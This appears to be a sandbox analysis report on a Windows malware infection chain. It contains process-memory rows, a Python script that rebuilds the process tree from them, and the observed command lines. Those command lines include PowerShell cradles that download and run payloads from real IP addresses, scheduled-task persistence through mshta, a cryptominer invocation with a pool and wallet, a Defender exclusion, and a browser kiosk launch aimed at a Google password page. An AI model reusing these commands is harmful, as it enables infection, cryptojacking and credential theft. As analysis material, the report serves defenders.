PID 1636 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\cmd.exe
PID 1636 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\cmd.exe
PID 1636 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\mshta.exe
PID 1636 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\mshta.exe
PID 1636 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\mshta.exe
PID 4592 wrote to memory of 4184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4592 wrote to memory of 4184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4592 wrote to memory of 4184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4284 wrote to memory of 2500 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 2500 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 2500 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4684 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 4684 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 4684 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2232 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 3116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3828 wrote to memory of 3116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3828 wrote to memory of 3116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2408 wrote to memory of 1944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3828 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4112 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4112 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4112 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1944 wrote to memory of 4260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1944 wrote to memory of 4260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2500 wrote to memory of 5096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE
PID 2500 wrote to memory of 5096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE
PID 2500 wrote to memory of 5096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE
PID 4260 wrote to memory of 1052 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4260 wrote to memory of 1052 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1944 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3828 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 1896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
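The WriteProcessMemory rows above are the most useful part of this table for an analyst, because in this sandbox output every row pairs a process with the child it had just launched: the rows double as a process tree. The script below is an added example, not part of the original report, that parses a subset of those rows (copied from the table, duplicates included, since the sandbox prints one row per call) and reconstructs the chain from the sample through rapes.exe to the mshta/PowerShell download stage. Treat the tree as a heuristic: a writer is not necessarily the parent, and a PID that several processes write into keeps only the last writer as its parent here.

```python
import re
from collections import OrderedDict, defaultdict

# Constructed sample input: a subset of the "Suspicious use of WriteProcessMemory"
# rows above, in the sandbox's own row layout. Duplicates are kept on purpose:
# the sandbox prints one row per WriteProcessMemory call, not per process pair.
T = r"C:\Users\Admin\AppData\Local\Temp"
W = r"C:\Windows"
ROWS = "\n".join([
    rf"PID 2020 wrote to memory of 1956 N/A {T}\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe {T}\Y4EY0F07LU5BLDPGTU34X9.exe",
    rf"PID 2020 wrote to memory of 1956 N/A {T}\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe {T}\Y4EY0F07LU5BLDPGTU34X9.exe",
    rf"PID 1956 wrote to memory of 2232 N/A {T}\Y4EY0F07LU5BLDPGTU34X9.exe {T}\bb556cff4a\rapes.exe",
    rf"PID 2232 wrote to memory of 1812 N/A {T}\bb556cff4a\rapes.exe {T}\10104900101\ce4pMzk.exe",
    rf"PID 2232 wrote to memory of 4040 N/A {T}\bb556cff4a\rapes.exe {T}\10106760101\PcAIvJ0.exe",
    rf"PID 4040 wrote to memory of 4124 N/A {T}\10106760101\PcAIvJ0.exe {W}\system32\cmd.exe",
    rf"PID 4124 wrote to memory of 2408 N/A {W}\system32\cmd.exe {W}\System32\WindowsPowerShell\v1.0\powershell.exe",
    rf"PID 2232 wrote to memory of 752 N/A {T}\bb556cff4a\rapes.exe {T}\10107310101\nhDLtPT.exe",
    rf"PID 752 wrote to memory of 4684 N/A {T}\10107310101\nhDLtPT.exe {T}\a58456755d\Gxtuum.exe",
    rf"PID 2232 wrote to memory of 1636 N/A {T}\bb556cff4a\rapes.exe {T}\10108470101\ed16c1310c.exe",
    rf"PID 2232 wrote to memory of 1636 N/A {T}\bb556cff4a\rapes.exe {T}\10108470101\ed16c1310c.exe",
    rf"PID 1636 wrote to memory of 4592 N/A {T}\10108470101\ed16c1310c.exe {W}\SysWOW64\cmd.exe",
    rf"PID 1636 wrote to memory of 4284 N/A {T}\10108470101\ed16c1310c.exe {W}\SysWOW64\mshta.exe",
    rf"PID 4592 wrote to memory of 4184 N/A {W}\SysWOW64\cmd.exe {W}\SysWOW64\schtasks.exe",
    rf"PID 4284 wrote to memory of 2500 N/A {W}\SysWOW64\mshta.exe {W}\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    rf"PID 4684 wrote to memory of 3452 N/A {T}\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe",
    rf"PID 2232 wrote to memory of 3828 N/A {T}\bb556cff4a\rapes.exe {W}\SysWOW64\cmd.exe",
    rf"PID 3828 wrote to memory of 3116 N/A {W}\SysWOW64\cmd.exe {W}\SysWOW64\timeout.exe",
    rf"PID 2408 wrote to memory of 1944 N/A {W}\System32\WindowsPowerShell\v1.0\powershell.exe {W}\System32\WindowsPowerShell\v1.0\powershell.exe",
    rf"PID 2500 wrote to memory of 5096 N/A {W}\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE",
    rf"PID 1944 wrote to memory of 4260 N/A {W}\System32\WindowsPowerShell\v1.0\powershell.exe {W}\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
    rf"PID 4260 wrote to memory of 1052 N/A {W}\Microsoft.NET\Framework64\v4.0.30319\csc.exe {W}\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
])

# Row layout: "PID <src> wrote to memory of <dst> N/A <src path> <dst path>".
# The second path is located by its drive-letter prefix, so paths containing
# spaces (e.g. "Program Files") still split correctly.
ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?) ([A-Za-z]:\\.+)$")


def parse_rows(text):
    """Return de-duplicated (src_pid, dst_pid, src_path, dst_path) tuples in first-seen order."""
    seen = OrderedDict()
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            seen.setdefault((int(m[1]), int(m[2])), (m[3], m[4]))
    return [(s, d, p[0], p[1]) for (s, d), p in seen.items()]


def build_tree(edges):
    """Map PID -> image name, PID -> ordered child PIDs, and the PIDs nobody wrote into (roots)."""
    names, children = {}, defaultdict(list)
    for src, dst, src_path, dst_path in edges:
        names.setdefault(src, src_path.rsplit("\\", 1)[-1])
        names.setdefault(dst, dst_path.rsplit("\\", 1)[-1])
        if dst not in children[src]:
            children[src].append(dst)
    targets = {d for _, d, _, _ in edges}
    roots = list(OrderedDict.fromkeys(s for s, *_ in edges if s not in targets))
    return names, dict(children), roots


def render(names, children, roots):
    """Indented text tree, one line per process."""
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{names[pid]} (PID {pid})")
        for child in children.get(pid, []):
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return lines


def chain_to(pid, names, children):
    """Image names from the root down to the given PID (last writer wins as parent)."""
    parent = {c: p for p, cs in children.items() for c in cs}
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return [names[p] for p in reversed(chain)]


if __name__ == "__main__":
    edges = parse_rows(ROWS)
    names, children, roots = build_tree(edges)
    print("\n".join(render(names, children, roots)))
    print(" -> ".join(chain_to(5096, names, children)))
```

The chain for PID 5096 ends in a file named TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE sitting directly under AppData\Local, not in the Temp folder; the Processes section below shows why (the download cradle concatenates $env:temp and the file name without a path separator).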

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe

"C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E34B.tmp\E34C.tmp\E34D.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn aiw93ma5VhJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\tGOAsdxdd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\tGOAsdxdd.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn aiw93ma5VhJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\tGOAsdxdd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\14dhhefq\14dhhefq.cmdline"

C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE

"C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES25D3.tmp" "c:\Users\Admin\AppData\Local\Temp\14dhhefq\CSC16BBA28762344C99B0BD8DC1F95B47F.TMP"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "jufCWmaq60l" /tr "mshta \"C:\Temp\1zsFbOQ8w.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\1zsFbOQ8w.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe

"C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe"

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\qD7QoBvD\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe

"C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe"

C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe

"C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe"

C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe

"C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1036 -ip 1036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 808

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe

"C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe

"C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe

"C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe"

C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe

"C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\ProgramData\nrwu\epug.exe

C:\ProgramData\nrwu\epug.exe

C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe

"C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Users\Admin\AppData\Local\Temp\10108990101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10108990101\zY9sqWs.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe

"C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1872 -prefsLen 27209 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7b00a46-2ac8-46fe-8d7a-d47405626773} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" gpu

C:\Users\Admin\AppData\Local\Temp\10109000101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10109000101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\15EF.tmp\15F0.tmp\15F1.bat C:\Users\Admin\AppData\Local\Temp\10109000101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 28129 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97896a8e-460a-4738-9135-137afff7abb0} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2952 -childID 1 -isForBrowser -prefsHandle 3044 -prefMapHandle 2720 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57198f2d-5dc9-4398-b8c4-19eb40c06aa4} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4080 -childID 2 -isForBrowser -prefsHandle 4076 -prefMapHandle 4052 -prefsLen 32619 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e213fe1-b986-490d-b935-6ea5687e2e43} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4932 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4840 -prefMapHandle 4836 -prefsLen 32619 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf19455d-8b82-4f05-835b-8d0b755a157f} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2580 -childID 3 -isForBrowser -prefsHandle 5376 -prefMapHandle 5308 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95e2556e-4c17-49ef-a6fd-4a9e95f1a1ef} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5496 -childID 4 -isForBrowser -prefsHandle 5500 -prefMapHandle 5504 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f891ba27-eed9-4111-90d6-48ef698a3192} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5680 -childID 5 -isForBrowser -prefsHandle 5688 -prefMapHandle 5692 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3b365fa-3a51-40dd-9b0b-802f3b498b83} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" tab

C:\Users\Admin\AppData\Local\Temp\10109010101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10109010101\v6Oqdnc.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5496 -ip 5496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 828

C:\Users\Admin\AppData\Local\Temp\E6Y1544WWSCW8CYF8.exe

"C:\Users\Admin\AppData\Local\Temp\E6Y1544WWSCW8CYF8.exe"

C:\Users\Admin\AppData\Local\Temp\10109030101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10109030101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3036 -ip 3036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 796

